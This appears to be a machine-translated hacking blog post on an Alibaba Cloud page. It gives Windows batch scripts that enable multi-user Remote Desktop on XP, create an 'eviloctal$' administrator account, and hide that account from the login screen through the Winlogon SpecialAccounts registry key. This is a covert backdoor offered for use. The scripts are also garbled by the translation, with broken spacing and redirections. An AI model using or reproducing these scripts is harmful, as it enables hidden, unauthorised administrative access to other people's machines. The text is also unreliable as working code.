XP Terminal Service Remote Login batch processing (evil gossip blog)

Source: Internet
Author: User
Based on the post on the first floor, we provide the following batch file...
Code
@ Echo regedit4> C:/EST. Reg
@ Echo.> C:/EST. Reg
@ Echo [HKEY_LOCAL_MACHINE/system/CurrentControlSet/control/Terminal Server/Licensing core]> C:/EST. Reg
@ Echo "enableconcurrensessions" = DWORD: 00000000> C:/EST. Reg
@ Echo "tsenabled" = DWORD: 00000001 >>>> C:/EST. Reg
@ Regedit/s c:/EST. Reg
@ Del/y c:/EST. Reg
@ Net start termservice
@ Shutdown-l

In this way, the multi-user mode of 3389 in XP is enabled...
Next we will add a user and synchronize the user name on the facial version when using friendly Logon :)
This batch is written in this way.

Code
@ Net user eviloctal $ Security/Add
@ Net Local Group administrators eviloctal $/Add
@ Echo regedit4> C:/eviloctal. Reg
@ Echo.> C:/eviloctal. Reg
@ Echo [HKEY_LOCAL_MACHINE/software/Microsoft/Windows/CurrentVersion/Winlogon/specialaccounts/userlist]> C:/eviloctal. Reg
@ Echo "eviloctal $" = DWORD: 00000000> C:/eviloctal. Reg
@ Regedit/s c:/eviloctal. Reg
@ Del/y c:/eviloctal. Reg

Hey, I am prepared here :)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.